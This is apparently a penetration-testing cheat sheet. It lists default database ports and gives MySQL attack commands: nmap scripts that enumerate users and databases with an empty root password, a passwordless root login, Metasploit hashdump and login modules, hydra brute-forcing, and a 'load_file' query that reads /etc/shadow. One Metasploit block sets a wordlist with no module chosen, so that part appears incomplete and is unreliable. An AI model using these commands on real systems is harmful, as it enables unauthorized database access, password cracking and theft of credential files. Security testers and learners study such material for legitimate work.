| Database | Port(s) | Doc |
|---|
| MaxDB | 7210 | Doc |
| MySQL | 3306 | Doc |
| Oracle DB | 1521, 1830 | Doc |
| PostgreSQL | 5432 | Doc |
| SQL Server (MSSQL) | 1433, 1434 | Doc |
| Database | Port(s) | Doc |
|---|
| Cassandra | 7000, 7001, 9042 | Doc |
| CouchDB | 5984 | Doc |
| Elasticsearch | 9200, 9300 | Doc |
| MongoDB | 27017, 27018, 27019, 28017 | Doc |
| Neo4J | 7473, 7474 | Doc |
| Redis | 6379 | Doc |
# Default scan
nmap $IP -sV -p 3306
# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password
# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info
# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Try to connect directly without a password
mysql -h $IP -u root
# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"
# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run
## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
setg rhosts $IP
set username root
set password ""
run
select load_file("/etc/shadow");
use auxiliary/scanner/mysql/mysql_login
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql